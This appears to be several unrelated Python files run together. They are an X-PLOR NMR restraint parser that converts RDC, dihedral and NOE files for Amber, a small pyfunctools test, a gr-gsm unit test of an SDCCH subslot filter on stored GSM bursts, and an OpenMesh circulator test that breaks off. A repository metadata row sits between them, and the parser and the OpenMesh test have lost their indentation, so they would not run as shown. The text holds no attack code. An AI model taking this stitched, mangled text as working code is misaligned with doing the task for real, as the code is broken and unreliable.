def check_rdc_xplor(xmlin):
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "rdc":
f_rdc = elt.get('filename')
ini_num = elt.get('number')
#nocorr = elt.get('nocorr')
nocorr = 0
print f_rdc
rdc_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_rdc )
#if os.path.exists(rdc_in):
# os.remove(rdc_in)
LPAR, RPAR, LBRK, RBRK, LBRC, RBRC, VBAR = map(Suppress, "()[]{}|")
bytes = Word(printables)
assi = Suppress(Regex(r"[aA][sS][sS][iI][a-z A-Z]*[a-z A-Z]*")).setResultsName("selection")
num = Word(nums+"."+"-")
numf = Group( num.setResultsName("val_rdc") + num.setResultsName("tol") ).setResultsName("values")
word = Word(alphanums+'"*#+%\'')
sand = Regex(r"[aA][nN][dD]")
sor = Regex(r"[oO][rR]")
cond = Suppress(sand | sor)
name = Suppress(Regex(r"[nN][aA][mM][eE]")) + Word(alphanums+'"*#+%\'').setResultsName("name")
resid = Suppress(Regex(r"[rR][eE][sS][iI][a-z A-Z]*")) + Word(nums).setResultsName("resid")
seidvoid = Literal('" "')
seidn = Group('"' + word + '"')
seid = seidvoid | seidn
#seid = ZeroOrMore(Word(alphanums+'"*#+% ') )
segid = Suppress(Regex(r"[sS][eE][gG][iI]*[a-z A-Z]") + seid)
trash = Suppress(LBRC + word + RBRC)
simpleString1 = Optional(segid) + Optional(cond) + resid + cond + Optional(name) + Optional(cond)
simpleString2 = OneOrMore(name + Optional(cond) )
simpleString = simpleString1 | simpleString2
display = LBRK + simpleString + RBRK
string_ = Optional(display) + simpleString
sexp = Forward()
sexpList = Group(LPAR + ZeroOrMore(sexp) + RPAR)
sexp << ( string_ | sexpList )
pr = assi + Optional(trash) + sexp + sexp + sexp + sexp + sexp.setResultsName("sel1") + sexp.setResultsName("sel2") + numf
file = open(rdc_in,"r")
file_r = []
for i in file:
file_r.append(i.split('!')[0])
#file_r = file.readlines()
xxx = ''.join(i for i in file_r)
#print xxx
sexpr = pr.searchString(xxx)
#pprint.pprint(sexpr.asList())
def remove_item(xml):
# remove XML entries produced by nested brackets
join_char=''
for i in xml.splitlines():
if not ("<ITEM>" in i or "</ITEM>" in i):
#print i
join_char += i + "\n"
return join_char
xml_rdc = etree.fromstring(remove_item(sexpr.asXML("rdc")))
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
xml_file = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_rdc+".xml")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(remove_item(sexpr.asXML("rdc")))
xml_file_w.close()
#print pdb_out
#print pdb_ref_n
print etree.tostring(xml_rdc, pretty_print=True)
return remove_item(sexpr.asXML("rdc"))
def check_dih_xplor(xmlin):
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "dihedral":
f_dih = elt.get('filename')
ini_num = elt.get('number')
#nocorr = elt.get('nocorr')
nocorr = 0
print f_dih
dih_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_dih )
#if os.path.exists(dih_in):
# os.remove(dih_in)
LPAR, RPAR, LBRK, RBRK, LBRC, RBRC, VBAR = map(Suppress, "()[]{}|")
bytes = Word(printables)
assi = Suppress(Regex(r"[aA][sS][sS][iI][a-z A-Z]*[a-z A-Z]*")).setResultsName("selection")
num = Word(nums+"."+"-")
numf = Group(num.setResultsName("c") + num.setResultsName("ang") + num.setResultsName("d_ang") + num.setResultsName("exp")).setResultsName("angle")
word = Word(alphanums+'"*#+%\'')
sand = Regex(r"[aA][nN][dD]")
sor = Regex(r"[oO][rR]")
cond = Suppress(sand | sor)
name = Suppress(Regex(r"[nN][aA][mM][eE]")) + Word(alphanums+'"*#+%\'').setResultsName("name")
resid = Suppress(Regex(r"[rR][eE][sS][iI][a-z A-Z]*")) + Word(nums).setResultsName("resid")
seidvoid = Literal('" "')
seidn = Group('"' + Regex(r" *[a-z A-Z 0-9]") + '"')
seid = seidvoid | seidn
#seid = ZeroOrMore(Word(alphanums+'"*#+% ') )
segid = Suppress(Regex(r"[sS][eE][gG][iI]*[a-z A-Z]") + seid)
trash = Suppress(LBRC + word + RBRC)
simpleString1 = Optional(segid) + Optional(cond) + resid + cond + Optional(name) + Optional(cond)
simpleString2 = OneOrMore(name + Optional(cond) )
simpleString = simpleString1 | simpleString2
display = LBRK + simpleString + RBRK
string_ = Optional(display) + simpleString
sexp = Forward()
sexpList = Group(LPAR + ZeroOrMore(sexp) + RPAR)
sexp << ( string_ | sexpList )
pr = assi + Optional(trash) + sexp.setResultsName("sel1") + sexp.setResultsName("sel2") + sexp.setResultsName("sel3") + sexp.setResultsName("sel4") + numf
file = open(dih_in,"r")
file_r = []
for i in file:
file_r.append(i.split('!')[0])
#file_r = file.readlines()
xxx = ''.join(i for i in file_r)
#print xxx
sexpr = pr.searchString(xxx)
#pprint.pprint(sexpr.asList())
def remove_item(xml):
# remove XML entries produced by nested brackets
join_char=''
for i in xml.splitlines():
if not ("<ITEM>" in i or "</ITEM>" in i):
#print i
join_char += i + "\n"
return join_char
xml_dih = etree.fromstring(remove_item(sexpr.asXML("dih")))
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
xml_file = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "xml_dih")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(remove_item(sexpr.asXML("dih")))
xml_file_w.close()
print pdb_out
print pdb_ref_n
print etree.tostring(xml_dih, pretty_print=True)
[resu_vx, out_rst]= cnvdx.convert(xml_dih, ini_num, pdb_out, pdb_ref_n,nocorr)
dih_out_rst = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_dih + "_dih_RST")
print dih_out_rst
dih_out_rst_file = open(dih_out_rst, 'w')
dih_out_rst_file.writelines(out_rst)
dih_out_rst_file.close()
return resu_vx
def check_noe_xplor(xmlin):
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "noe":
f_noe = elt.get('filename')
ini_num = elt.get('number')
nocorr = elt.get('nocorr')
#nocorr = 0
print f_noe
noe_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_noe)
#if os.path.exists(noe_in):
# os.remove(noe_in)
LPAR, RPAR, LBRK, RBRK, LBRC, RBRC, VBAR = map(Suppress, "()[]{}|")
bytes = Word(printables)
assi = Suppress(Regex(r"[aA][sS][sS][iI][a-z A-Z]*[a-z A-Z]*")).setResultsName("selection")
num = Word(nums+".")
numf = Group(num.setResultsName("D") + num.setResultsName("D_minus") + num.setResultsName("D_plus"))
word = Word(alphanums+'"*#+%\'')
sand = Regex(r"[aA][nN][dD]")
sor = Regex(r"[oO][rR]")
cond = Suppress(sand | sor)
name = Suppress(Regex(r"[nN][aA][mM][eE]")) + Word(alphanums+'"*#+%\'').setResultsName("name")
resid = Suppress(Regex(r"[rR][eE][sS][iI][a-z A-Z]*")) + Word(nums).setResultsName("resid")
seidvoid = Literal('" "')
seidn = Group('"' + Regex(r" *[a-z A-Z 0-9]") + '"')
seid = seidvoid | seidn
#seid = ZeroOrMore(Word(alphanums+'"*#+% ') )
segid = Suppress(Regex(r"[sS][eE][gG][iI]*[a-z A-Z]") + seid)
trash = Suppress(LBRC + word + RBRC)
simpleString1 = Optional(segid) + Optional(cond) + resid + cond + Optional(name) + Optional(cond)
simpleString2 = OneOrMore(name + Optional(cond) )
simpleString = simpleString1 | simpleString2
display = LBRK + simpleString + RBRK
string_ = Optional(display) + simpleString
sexp = Forward()
sexpList = Group(LPAR + ZeroOrMore(sexp) + RPAR)
sexp << ( string_ | sexpList )
optor = sor + sexp.setResultsName("selQ1") + sexp.setResultsName("selQ2")
pr = assi + Optional(trash) + sexp.setResultsName("sel1") + sexp.setResultsName("sel2") + numf + ZeroOrMore(optor)
file = open(noe_in,"r")
file_r = []
for i in file:
file_r.append(i.split('!')[0])
#file_r = file.readlines()
xxx = ''.join(i for i in file_r)
#print xxx
sexpr = pr.searchString(xxx)
#pprint.pprint(sexpr.asList())
def remove_item(xml):
# remove XML entries produced by nested brackets
join_char=''
for i in xml.splitlines():
if not ("<ITEM>" in i or "</ITEM>" in i):
#print i
join_char += i + "\n"
return join_char
xml_noe = etree.fromstring(remove_item(sexpr.asXML("noe")))
sele = xml_noe.findall("selection")
# convert OR-ed selections into QQG/QQD pseudo-atoms
for i in sele:
selq1 = i.find("selQ1")
selq2 = i.find("selQ2")
sel1 = i.find("sel1")
sel2 = i.find("sel2")
if selq1 is not None:
te = selq1.find("name").text
if (te == "HG1#" or te == "HG2#") and (sel1.find("name").text[0:2] == te[0:2] and sel1.find("name").text.find("#") > 0):
#print selq1.find("name").text, sel1.find("name").text
sel1.remove(sel1.find("name"))
nsl1 = etree.SubElement(sel1, "name" )
nsl1.text = "QQG"
if (te == "HD1#" or te == "HD2#") and (sel1.find("name").text[0:2] == te[0:2] and sel1.find("name").text.find("#") > 0):
#print selq1.find("name").text, sel1.find("name").text
sel1.remove(sel1.find("name"))
nsl1 = etree.SubElement(sel1, "name" )
nsl1.text = "QQD"
if selq2 is not None:
te = selq2.find("name").text
if (te == "HG1#" or te == "HG2#") and (sel2.find("name").text[0:2] == te[0:2] and sel2.find("name").text.find("#") > 0):
#print selq2.find("name").text, sel2.find("name").text
sel2.remove(sel2.find("name"))
nsl2 = etree.SubElement(sel2, "name" )
nsl2.text = "QQG"
if (te == "HD1#" or te == "HD2#") and (sel2.find("name").text[0:2] == te[0:2] and sel2.find("name").text.find("#") > 0):
#print selq2.find("name").text, sel2.find("name").text
sel2.remove(sel2.find("name"))
nsl2 = etree.SubElement(sel2, "name" )
nsl2.text = "QQD"
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
xml_file = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "xml_noe")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(etree.tostring(xml_noe))
xml_file_w.close()
print pdb_out
print pdb_ref_n
# Xplor manages lol restraints within the tbl file; disabled here by default
etree.SubElement(xml_noe, "lol").text = "False"
print etree.tostring(xml_noe, pretty_print=True)
nocorr = 0
[resu_vx, outx] = cnvx.convert(xml_noe, ini_num, pdb_out, pdb_ref_n, nocorr)
noe_out_rst = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_noe + "_noe_RST")
print noe_out_rst
noe_out_rst_file = open(noe_out_rst, 'w')
noe_out_rst_file.writelines(outx)
noe_out_rst_file.close()
return resu_vx
# File: tests/test_utils/test_is_func.py (natanfeitosa/pyfunctools, MIT license)
from pyfunctools.utils import is_func


def test_is_func():
    def func():
        pass

    assert is_func(func)
    assert is_func(lambda a: a)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @file
# @author Roman Khassraf <rkhassraf@gmail.com>
# @section LICENSE
#
# Gr-gsm is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# Gr-gsm is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gr-gsm; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
#
from gnuradio import gr, gr_unittest, blocks
import grgsm

class qa_burst_sdcch_subslot_filter(gr_unittest.TestCase):
    # 102 random bursts as test input
    bursts_input = [
'0000111100101011111011010010011001000100001001110110000110110001011011101111000100101111111000110000001111111111000111100100011111010100010011111000',
'0001111110000000110110101010001000101000001101111100101100110010001111011010001000111100001010011101000111010111000100000111001111110011000011011000',
'0001101110111011011011011010000001011011001011000100100110010101001111101100010100111110110011001100100011111010110111011001000111101011100001111000',
'0000001011100110100011110111010101111000011111001011010011110000110101110010000011010110010011111001000110001111111010111011011001101010001100110000',
'0001011001110011011101111111100110110111011101001110111110000101001111101100010100111110001111100000000110001000010000010111111011110101100000111000',
'0001110110011011010011100010101010000100011000001111110101111101001111101100010100111110100001001101000100000001011001010110011111100010001111001000',
'0001101100101101011110011001110110011100001100100100100110000010001111011010001000111101101101001100100001110001011001000001100000011111101000011000',
'0000101100001011101001010001111001000000010100000111100110101000110101110010000011010110110000110010100011001111101101101001110111101001000011111000',
'0000011011010111011111101100010100110110000001100011100001010001011011101111000100101110001110000011001100100101111000001010000101010000110101110000',
'0000111100110111001011010100010010110100101010000000010001110010011101011000001001110100001010011111111111001010111010111010001111111101111110101000',
'0000111101101110011111010100010100110001101110001001111100100101001111101100010100111111100010010001001100000000111010001000100011010000110111110000',
'0000011100010011111011011001110010011000001111111110101000100000110101110010000011010111101011000100101011000011011011110000010001100110011010001000',
'0000011011100100011101000010111010101101001111110000110001111010000111011101001000011101111110101010000011100100111101000111101110011011001001100000',
'0000110100110111001010100011100010101001001010011001001111001001001011100001000100101111001001100100001111100111000101110111100011101100110100010000',
'0000011101101000110111010010111001011110101000001011111000101010000111011101001000011100100100010110101110101010001000011001001110100001000101001000',
'0000101000110000011100111010101000001101000111111101100100110010011101011000001001110101001101110101011110010100101010001110100001100010101000001000',
'0000100010110110000111101001011000001010011110000100111101111010011101011000001001110101100010000111010100001000110001110001111101010100100101010000',
'0000010110111011011100011101010001001011001110100011100001000101001111101100010100111110100100110001110011001011110001100000000100100111000011111000',
'0001101110100101110101100101011101111100111010101011110001101010000111011101001000011100100010100111110110111001001000100111110111100100010010111000',
'0000111000101011011101110110001110101111100010100000110111110010000111011101001000011101111011000101010100011111001000010000110101101110000010101000',
'0001001010011001111011001110100001000110010111110011111001000010011101011000001001110100001101000101010010001101001010111100100101010101011100110000',
'0000100010001111101111100100010010100000010111001011101101001000110101110010000011010110110011100111001001100101011010100101110011100001110010001000',
'0000100100010010111100111000011000001100100001110101110011011001011011101111000100101111001011000000010111001011110011000000001101100001001000100000',
'0001010000110010100010110111101111100100000011111000000010111010011101011000001001110101111100000011101010001010100001101000011010110000001001111000',
'0001101101111011000010001000000010001110101111001111111111110001011011101111000100101110110001011010110110100111000000010010101110111001111011000000',
'0001101000100010100001101100100101011100111000001101001010100010011101011000001001110100011100101100000010110101011011100111111011111101100000011000',
'0001010110101101110000011111101100001000001001110101100000011010001111011010001000111100000100110001111110110111010101011011011100111000101111010000',
'0000010000111000010001010010111110000100011000000101110110001000110101110010000011010111001100010011100001111101000101011110100001100010010110001000',
'0000011110101100001001101000001010010100100111101101101000110101001111101100010100111111011001110000011000100001010011100000001100010110101001001000',
'0001110111101011100000001011111101100110110001001100101111110010000111011101001000011101110010001111000010011110001101101111101011100001001100100000',
'0001111110100011001100101111001001101000101110011100011000100001001011100001000100101110000110110010111111110101000110001011010110011010100011001000',
'0001011100010110000001011011001100000101010000011010001000111111011110001001011101111001101111000011111110011001000010000011000101100011111001010000',
'0001110111001111101101110111110000001110111011011100110110001001001011100001000100101110100101001001000110101110111110100110100100111111011001011000',
'0001011111010100110010101100011000100011000011111000111100010101001111101100010100111111100110001110010110001110000101110000100101010111100100111000',
'0001000100110100001010000101011001010000001111001110011010001001001011100001000100101111100011000100111100100010111001010010110100010000110000110000',
'0001001100101001010111000101000101000000111101011111000001011010001111011010001000111100110110011000000011010000100110111101110011110011000011010000',
'0001011010100110110011000101111111010011110001101000011100101000110101110010000011010110110100000111011101000001101010100001110111001011010101111000',
'0000101010001100010011010101011110010101101110011110100110001010001111011010001000111100000010011011100001010001001111111100011111000011001010011000',
'0000111001011100101100111001010101000101010111011110111101010001001011100001000100101111100010100101111011000101100000101111000101011110011111100000',
'0000010101101111011001100001011100100101001000110111010110001111011110001001011101111000011010010010101111010000110000011001101011100000111110000000',
'0001000001011000010001000100100111110011001101111100010011110010011101011000001001110100110100101101100011010111101110110010101101001110001101010000',
'0000101000011101110011111001010011111001001010010000101110010001011011101111000100101111011111110000000100000110011001000100110000111001100000011000',
'0000100101010011010110101001100100110001011010111110110100011101001111101100010100111110111000110110100011001010110011000111011111110011001011100000',
'0001000110100001111010110101011111001000011100001111010110001001011011101111000100101111100001011001100110011001110101100001000001011011111110100000',
'0001011010100110001000100000001110010000011000111001001110000001001011100001000100101110011011011001000111101010001010111001101100000100001101001000',
'0000001010000101101010000000110000010101111011100110101000110111011110001001011101111001100011100100100100100000010010001111101111110011000001011000',
'0000000111000111010110000000001001101110001001001101100110010001011011101111000100101111101011111100101001110100101000011100111001001101101011101000',
'0000100100010111010011100110101011011010001011011011011101110010001111011010001000111100000110010111001010011100000011111100111000100100101010110000',
'0000101111000000100110100001011000000011111111010101010011011010000111011101001000011101110010101101000100100000001100001000100111001010010000111000',
'0000001001001101110111111011010011000011100001100011110011010001001011100001000100101110011100000010010111101100101011011111101011000000001100101000',
'0001100111010111011000100111110000111010111001011100011111000000110101110010000011010111001000000010000010011010111001111001011011011111110101011000',
'0000100010110111011001100110110010101011011110101001010001000001011011101111000100101111010101100010101110101111111011101000010111001111000101001000',
'0001110000101111100101001101001111101011000000011011000101111000110101110010000011010111111100111011111000000001010111001100110100100011010000011000',
'0000011000101001110100000000110101011101011010001101110110111001011011101111000100101111110110101011110110100111000000000011110011101000011000001000',
'0000101001000100101010001110110111010000011011001011101010010111011110001001011101111001111010110101100100101001111000100000010001000110000000110000',
'0000000111100101111111000110011101000110010110001110100101110001011011101111000100101110100010010011100010010001110100010101101101100111100110101000',
'0001000011111010000000011010011001010010011111000011110111010010001111011010001000111101101110111000011010001010100111011000001000110000101000000000',
'0001101000110010011001001110101101111110000111001101100110011001001011100001000100101110000101000111011001110001100011011101101000101001001001101000',
'0001100111010000101101001110010001001001011000011000001011001010011101011000001001110101101110110101111101110010010010000001000100011111010100011000',
'0001001101011001110000101110011110100001001000001111000100001001001011100001000100101110100010110100111010110010011000100111000100111111011000101000',
'0001001101010000111101110111111011000100101011011001110001001010011101011000001001110101000000011110001101001010110001100011000110100010011010000000',
'0000100100011000011010111010110001000101111010001001010110100001011011101111000100101111100001000101011111111110000011111111100110100100110000111000',
'0001011101111100011001100110010001000101100001001001000010110001011011101111000100101110101100111111101111111001110110100101000011100110000001011000',
'0001101000100100101011000001001101111011100110101010001110100010000111011101001000011101101101011111110001110001010000001111100110111101101000100000',
'0000010101011110000000010011100010101011101111011001100111001010001111011010001000111100010001101011101000101100010110100100001101010110010111000000',
'0001100011011000111011100010111111000000011111101010000010110001011011101111000100101111010100100110010000001010100011100001111011110010001011001000',
'0001001011000011010010000001001110110110010101010011000101001000110101110010000011010111010010011000110011000110000101111000010100001000011111111000',
'0000010100100110100110001010001011011000110000101011000001110001001011100001000100101111101010000111110111011010101010001100101100010100001000010000',
'0001101100111011110100000010111000000110111101001110111110111010011101011000001001110101011110110010010011001011001110101001101010101001011000010000',
'0001100011110111001100101110010110000110101101101111101101111001011011101111000100101111110001100010010000011100010000011011100010100111101001110000',
'0001010011010010101001001000100111111010011101011001110110010001011011101111000100101111111010111010010001100100101100011000100110011001101101000000',
'0000111011001001001100100100100101011111011100110101011100010010011101011000001001110101010100111100111001000001100010100111100001010011111111111000',
'0001100101110101101110111111000100110000001111010000100001011101001111101100010100111110111111110111000010011100101001111011010100001010001010001000',
'0000001000011111101111110000000000001100011111011010111010000111011110001001011101111001001100000001010100111111011000000110010111101001110010011000',
'0000100000011100011111001001001000001000100010010111101011101010011101011000001001110100000000010010011001110100101111001110111111010000010001000000',
'0001000101001011001111111101010111110010010110111111110000010001011011101111000100101111000100010000111110011101000001111100001001100100011100011000',
'0001101101101010110000001001110111001001000001110110110000110001001011100001000100101111100001110001000000110101100001111111001001111001101101100000',
'0000110011100000100000000010100100011001001000110010110101111001001011100001000100101110000111001100111111110011011001000001001000001111001101001000',
'0001001111100001110110001010100011100011110011100001010100001001001011100001000100101111001000101100111101001010111000010111101000000001101100101000',
'0000101001000010000001100001000011001010100011110111101110111001001011100001000100101110001010100101111010111000000010111011000010011001101000001000',
'0001101000000100110100110001010111010111111001101110110101100111011110001001011101111001000110010011100100000100011101110110111010001001000111101000',
'0000100000100110011100101001110010011011100010101101111001110010001111011010001000111101100000111011110010010111001100100010000101111111011101110000',
'0000100111111010101000001110100011010010010010100001011010110000110101110010000011010110011000111000111111000100001010010000011011001000011100110000',
'0001110110111100101101010011111100101100100100110001110110111001001011100001000100101110010111011011100001001010010100010101110100011111010101001000',
'0000111001001000110010011110000010011101000001010111011011111010011101011000001001110101011101101100101110010111010001100100000011100100111101010000',
'0001000001010011101010101011111100010010101110100001000111110010011101011000001001110101100000100101011101111101101101111000001101101010001000101000',
'0001101000001011010011001010011010100110010100011010101101011010000111011101001000011101100010011011111111101011100110000011110110001111000101101000',
'0000001010101101011001000000001000001001110100000111000000101001001011100001000100101110111111011101110101010011001110111111101001011010110000101000',
'0001011110101111110100110010010110011100111010011001001110011111011110001001011101111000101010001111000111000101111000100011100010100010010100010000',
'0001000001011110010010100001100010111111000111001111010101011111011110001001011101111001010010100101110110111111001111110010111100111010110011110000',
'0001111100100010101100010111000000011011001111001101101001000010001111011010001000111101111000000101111001110101101001101010001110100111101011001000',
'0000000011001001101001100111101011001011000100101100101001100010001111011010001000111101100100101001010100111000010001011000100110010101010111000000',
'0001111000011111011100011010110000000010000000100000111000100010011101011000001001110100011101011101001001000111011101100001011010101000011011011000',
'0001011000010101011100101011111010110101011110011011001011010010001111011010001000111100110111000110100100001100110100000001100100100111101010011000',
'0001010101101101101001011100101001110000100101011110100011100010011101011000001001110100111100001000000111000001111100011011101000101100111100111000',
'0000010101001010001110001001101101011011000110011011110111111000110101110010000011010110000000110010100100111001010110110011011101011001110100100000',
'0001111111000101100000111010111010011010011110110010111000010101001111101100010100111110000110010011101101011111001000010001111111000111001111011000',
'0000100101100011001010101100011110000111001110010010010000100001011011101111000100101110001111010000001000001101011010110101010111011011001101101000',
'0000110000111101100001011100100011101011011000111100001000000111011110001001011101111000111000000111100100101000000101100011011001111100110011110000',
'0000011001111001100111110110110000001111110101011110100011010010011101011000001001110101001101110111111100001001000101101101100110001111101011010000',
'0000100001011010001010000101110000111100011110110010000010101000110101110010000011010111010001010101111111111101101100110101111010110100001110101000',
'0000000111101000111001101101110011001100100000101111001011001111011110001001011101111001010011110001010010000011001100100001011001111010101011011000'
    ]

    # 102 sequential frame numbers starting at 879852
    framenumbers_input = list(range(879852, 879954))
    # All bursts are on timeslot 0
    timeslots_input = [0] * 102

    def setUp(self):
        self.tb = gr.top_block()

    def tearDown(self):
        self.tb = None
    def test_001_sdcch8(self):
        bursts_expected = [
'0000011011010111011111101100010100110110000001100011100001010001011011101111000100101110001110000011001100100101111000001010000101010000110101110000',
'0000111100110111001011010100010010110100101010000000010001110010011101011000001001110100001010011111111111001010111010111010001111111101111110101000',
'0000111101101110011111010100010100110001101110001001111100100101001111101100010100111111100010010001001100000000111010001000100011010000110111110000',
'0000011100010011111011011001110010011000001111111110101000100000110101110010000011010111101011000100101011000011011011110000010001100110011010001000',
'0001000001011000010001000100100111110011001101111100010011110010011101011000001001110100110100101101100011010111101110110010101101001110001101010000',
'0000101000011101110011111001010011111001001010010000101110010001011011101111000100101111011111110000000100000110011001000100110000111001100000011000',
'0000100101010011010110101001100100110001011010111110110100011101001111101100010100111110111000110110100011001010110011000111011111110011001011100000',
'0001000110100001111010110101011111001000011100001111010110001001011011101111000100101111100001011001100110011001110101100001000001011011111110100000',
'0001001101011001110000101110011110100001001000001111000100001001001011100001000100101110100010110100111010110010011000100111000100111111011000101000',
'0001001101010000111101110111111011000100101011011001110001001010011101011000001001110101000000011110001101001010110001100011000110100010011010000000',
'0000100100011000011010111010110001000101111010001001010110100001011011101111000100101111100001000101011111111110000011111111100110100100110000111000',
'0001011101111100011001100110010001000101100001001001000010110001011011101111000100101110101100111111101111111001110110100101000011100110000001011000',
        ]
        subslot = 2
        src = grgsm.burst_source(self.framenumbers_input, self.timeslots_input, self.bursts_input)
        ss_filter = grgsm.burst_sdcch_subslot_filter(grgsm.SS_FILTER_SDCCH8, subslot)
        sink = grgsm.burst_sink()
        self.tb.msg_connect(src, "out", ss_filter, "in")
        self.tb.msg_connect(ss_filter, "out", sink, "in")
        self.tb.run()
        bursts_result = list(sink.get_burst_data())
        self.assertEqual(bursts_expected, bursts_result)
    def test_002_sdcch4(self):
        bursts_expected = [
'0001110111001111101101110111110000001110111011011100110110001001001011100001000100101110100101001001000110101110111110100110100100111111011001011000',
'0001011111010100110010101100011000100011000011111000111100010101001111101100010100111111100110001110010110001110000101110000100101010111100100111000',
'0001000100110100001010000101011001010000001111001110011010001001001011100001000100101111100011000100111100100010111001010010110100010000110000110000',
'0001001100101001010111000101000101000000111101011111000001011010001111011010001000111100110110011000000011010000100110111101110011110011000011010000',
'0001110110111100101101010011111100101100100100110001110110111001001011100001000100101110010111011011100001001010010100010101110100011111010101001000',
'0000111001001000110010011110000010011101000001010111011011111010011101011000001001110101011101101100101110010111010001100100000011100100111101010000',
'0001000001010011101010101011111100010010101110100001000111110010011101011000001001110101100000100101011101111101101101111000001101101010001000101000',
'0001101000001011010011001010011010100110010100011010101101011010000111011101001000011101100010011011111111101011100110000011110110001111000101101000',
'0001011000010101011100101011111010110101011110011011001011010010001111011010001000111100110111000110100100001100110100000001100100100111101010011000',
'0001010101101101101001011100101001110000100101011110100011100010011101011000001001110100111100001000000111000001111100011011101000101100111100111000',
'0000010101001010001110001001101101011011000110011011110111111000110101110010000011010110000000110010100100111001010110110011011101011001110100100000',
'0001111111000101100000111010111010011010011110110010111000010101001111101100010100111110000110010011101101011111001000010001111111000111001111011000',
        ]
        subslot = 2
        src = grgsm.burst_source(self.framenumbers_input, self.timeslots_input, self.bursts_input)
        splitter = grgsm.burst_sdcch_subslot_filter(grgsm.SS_FILTER_SDCCH4, subslot)
        sink = grgsm.burst_sink()
        self.tb.msg_connect(src, "out", splitter, "in")
        self.tb.msg_connect(splitter, "out", sink, "in")
        self.tb.run()
        bursts_result = list(sink.get_burst_data())
        self.assertEqual(bursts_result, bursts_expected)


if __name__ == '__main__':
    gr_unittest.run(qa_burst_sdcch_subslot_filter, "qa_burst_sdcch_subslot_filter.xml")

from .error_ellipse import error_ellipse
8232c0cefb741f739f571efb0c8d9d6401e7fad7 | 8,876 | py | Python | src/Python/Unittests/test_trimesh_circulator_current_halfedge_handle_replacement.py | rzoller/OpenMesh | f84bca0b26c61eab5f9335b2191962ca8545c5f6 | [
"BSD-3-Clause"
] | 19 | 2020-08-13T05:15:09.000Z | 2022-03-31T14:51:29.000Z | src/Python/Unittests/test_trimesh_circulator_current_halfedge_handle_replacement.py | ccopsey/OpenMesh | 93e6e626c3f282bf4275521c33cd8da1ca559c7d | [
"BSD-3-Clause"
] | 2 | 2020-09-08T07:03:04.000Z | 2021-08-04T05:43:27.000Z | src/Python/Unittests/test_trimesh_circulator_current_halfedge_handle_replacement.py | ccopsey/OpenMesh | 93e6e626c3f282bf4275521c33cd8da1ca559c7d | [
"BSD-3-Clause"
] | 10 | 2020-08-06T02:37:46.000Z | 2021-07-01T09:12:06.000Z | import unittest
import openmesh
class TrimeshCirculatorCurrentHalfedgeHandleReplacement(unittest.TestCase):
def setUp(self):
self.mesh = openmesh.TriMesh()
self.vhandle = []
def test_dereference(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(1, 0, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, -1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, -1, 0)))
# Add four faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[1])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
# Test setup:
# 0 ==== 2
# |\ 0 /|
# | \ / |
# |2 1 3|
# | / \ |
# |/ 1 \|
# 3 ==== 4
# Starting vertex is 1->4
# output from fh_it.current_halfedge_handle()
current_halfedge_handles = [4, 0, 2, 10, 6, 8, 1, 12, 7, 14, 3, 11]
i = 0
for f in self.mesh.faces():
for he in self.mesh.fh(f):
self.assertEqual(he.idx(), current_halfedge_handles[i])
i += 1
def test_vv_iter(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(1, 0, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, -1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, -1, 0)))
# Add four faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
